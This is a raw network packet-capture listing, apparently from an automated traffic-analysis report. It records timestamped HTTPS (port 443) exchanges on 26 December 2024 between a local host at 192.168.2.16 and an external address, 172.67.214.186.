                                                                                                                                                                              Dec 26, 2024 18:26:43.719053984 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.719098091 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.726351976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.726372957 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.726417065 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.726422071 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.726445913 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.726465940 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.733345985 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.733366013 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.733414888 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.733418941 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.733458042 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.740607023 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.740895033 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.740914106 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.740952969 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.740957022 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.740988970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.741007090 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.747381926 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.747401953 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.747447968 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.747452974 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.747476101 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.747493029 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.908248901 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.908282995 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.908428907 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.908428907 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.908442020 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.908488035 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.915605068 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.915627003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.915689945 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.915697098 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.915741920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.922049999 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.922069073 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.922120094 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.922126055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.922148943 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.922168016 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.929749966 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.929769993 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.929831982 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.929836988 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.929879904 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.936975956 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.936995983 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.937052011 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.937057018 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.937098026 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.943928003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.943948984 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.944010973 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.944020033 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.944062948 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.951514959 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.951536894 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.951581001 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.951586008 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.951606035 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.951633930 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.958117962 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.958139896 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.958194017 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:43.958199024 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:43.958244085 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.119343042 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.119383097 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.119429111 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.119436026 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.119472027 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.119489908 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.126024008 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.126044035 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.126081944 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.126086950 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.126116037 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.126137972 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.133268118 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.133289099 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.133342028 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.133347988 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.133397102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.140747070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.140767097 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.140808105 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.140813112 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.140836954 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.140860081 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.147150040 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.147171021 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.147209883 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.147216082 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.147247076 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.147258043 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.155148029 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.155169964 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.155221939 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.155227900 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.155255079 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.155282021 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.160628080 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.160674095 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.160710096 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.160715103 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.160748959 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.167124987 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.167146921 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.167193890 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.167198896 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.167232990 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.216685057 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.293555975 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.327657938 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.327692032 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.327750921 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.327760935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.327792883 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.327815056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.335016966 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.335040092 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.335082054 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.335087061 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.335115910 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.335136890 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.342582941 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.342602968 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.342641115 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.342647076 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.342685938 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.349993944 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.350013971 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.350049019 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.350053072 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.350087881 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.350105047 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.356395006 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.356415987 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.356477022 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.356482029 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.356527090 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.363445044 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.363466024 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.363508940 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.363514900 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.363540888 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.363564014 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.370992899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.371015072 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.371052980 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.371057034 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.371083975 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.371103048 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.378417969 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.378437996 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.378479004 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.378484011 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.378511906 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.378530025 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.538186073 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.538213968 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.538294077 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.538300991 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.538353920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.546278954 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.546298981 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.546356916 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.546363115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.546406031 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.553078890 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.553106070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.553158998 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.553164005 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.553200006 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.560558081 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.560585022 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.560635090 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.560641050 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.560652018 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.560678959 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.567090034 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.567110062 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.567150116 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.567154884 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.567183971 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.567203999 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.575141907 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.575164080 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.575191975 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.575197935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.575222969 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.575243950 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.581500053 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.581521034 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.581559896 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.581566095 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.581589937 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.581614017 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.583671093 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.583725929 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.588882923 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.588929892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.588943958 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.588948011 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.588973999 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.588987112 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.751641035 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.751665115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.751707077 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.751713037 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.751746893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.751764059 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.752835989 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.752887011 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.760276079 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.760297060 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.760332108 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.760337114 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.760365963 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.767673016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.767700911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.767735958 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.767741919 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.767760038 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.774305105 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.774332047 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.774365902 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.774373055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.774398088 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.782114029 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.782141924 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.782176018 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.782181978 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.782210112 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.788665056 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.788682938 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.788722992 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.788727999 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.788757086 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.796010971 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.796035051 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.796072006 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.796077013 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.796111107 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.803536892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.803555965 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.803611040 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.803616047 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.855700970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.965152979 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.965166092 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.965188980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.965226889 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.965233088 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.965255976 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.965281010 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.972636938 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.972659111 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.972693920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.972698927 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.972728014 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.972738981 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.979195118 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.979218006 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.979250908 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.979255915 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.979284048 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.979302883 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.986638069 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.986658096 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.986712933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.986717939 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.986763954 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.994227886 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.994249105 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.994283915 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.994288921 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:44.994321108 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:44.994328022 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.002055883 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.002079010 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.002115965 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.002120972 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.002151966 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.002162933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.004376888 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.004430056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.011693001 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.011722088 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:45.011751890 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:45.011755943 CET44349719172.67.214.186192.168.2.16
